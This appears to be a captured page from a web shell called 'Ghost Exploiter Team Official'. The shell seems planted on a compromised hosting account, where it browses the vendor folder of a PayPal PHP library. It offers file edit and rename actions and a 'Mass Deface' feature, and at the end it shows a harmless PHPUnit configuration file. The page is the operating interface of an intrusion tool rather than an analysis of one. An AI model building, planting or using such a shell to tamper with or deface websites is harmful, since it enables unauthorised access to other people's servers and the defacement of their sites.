webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
srmklive
/
paypal
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
.github
--
ren
config
--
ren
lang
--
ren
src
--
ren
tests
--
ren
.coveralls.yml
0.023KB
edt
ren
.gitattributes
0.041KB
edt
ren
.gitignore
0.091KB
edt
ren
.scrutinizer.yml
0.839KB
edt
ren
.travis.yml.bak
0.945KB
edt
ren
Dockerfile
0.418KB
edt
ren
LICENSE
1.055KB
edt
ren
README.md
7.221KB
edt
ren
composer.json
1.441KB
edt
ren
docker-compose.yml
0.173KB
edt
ren
phpstan.neon.dist
0.208KB
edt
ren
phpunit.xml.dist
1.117KB
edt
ren
phpunit.xml.dist.php72
1.161KB
edt
ren
phpunit.xml.dist.php8
1.177KB
edt
ren
supervisor.conf
0.026KB
edt
ren
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" bootstrap="vendor/autoload.php" backupGlobals="false" backupStaticAttributes="false" colors="true" verbose="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/9.3/phpunit.xsd"> <coverage> <include> <directory suffix=".php">src/</directory> </include> <exclude> <file>src/PayPalFacadeAccessor.php</file> <file>src/Traits/PayPalVerifyIPN.php</file> <file>src/Services/Str.php</file> <directory suffix=".php">src/Facades/</directory> <directory suffix=".php">src/Providers/</directory> </exclude> <report> <clover outputFile="build/logs/clover.xml"/> <html outputDirectory="build/coverage"/> <text outputFile="build/coverage.txt"/> </report> </coverage> <testsuites> <testsuite name="PayPal Test Suite"> <directory>tests</directory> </testsuite> </testsuites> <logging> <junit outputFile="build/report.junit.xml"/> </logging> </phpunit>